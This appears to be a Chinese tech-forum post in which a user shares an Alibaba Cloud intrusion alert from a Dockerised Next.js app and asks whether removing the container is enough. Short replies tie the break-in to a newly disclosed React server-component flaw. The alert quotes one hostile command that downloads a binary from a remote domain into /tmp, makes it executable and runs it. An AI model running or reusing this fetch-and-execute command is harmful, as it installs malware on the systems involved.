晚上收到阿里云告警可疑命令执行
告警原因 检测模型发现您的服务器上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关。 用户名 www 命令行 /bin/sh -c wget -O /tmp/nginx3 http://res.qiqigece.top/nginx1;chmod 777 /tmp/nginx3;/tmp/nginx3 进程 ID 241050 父进程 ID 1061286 进程链 -[1061043] /usr/bin/containerd-shim-runc-v2 -namespace moby -id 5ae04de666d9af832833653883924afe2522ae749cf1635f8e16a086779c6dc4 -address /run/containerd/containerd.sock -[1061069] node /usr/local/bin/pnpm start-docker -[1061113] node /app/node_modules/.bin/../.pnpm/[email protected]/node_modules/npm-run-all/bin/npm-run-all/index.js check-db update-tracker set-routes-manifest start-server -[1061275] node /usr/local/lib/node_modules/pnpm/bin/pnpm.cjs run start-server -[1061286] next-server (v 微步检测:
https://s.threatbook.com/report/url/19a03bf704e725d1e64a84b8a245a043
我是在 docker 部署的,只移除 docker 安全吗?
 | 1 ysicing 9 天前 最近不是说 nextjs 和 react 漏洞问题么。昨天披露的,今天就有好多 poc 了,我们今天就接到好多的入侵挂码的 |
 | 4 abear 9 天前 这玩意被入侵了,要重装系统吗 ^-^ |
 | 6 zerolover 8 天前 umami 挺好用的,目前我们还是用官网的服务,主要是我们网站访问量没有太多。等后面再自己部署 |
 | 7 tabc2tgacd 8 天前 react 的服务器组件漏洞 |
Select Language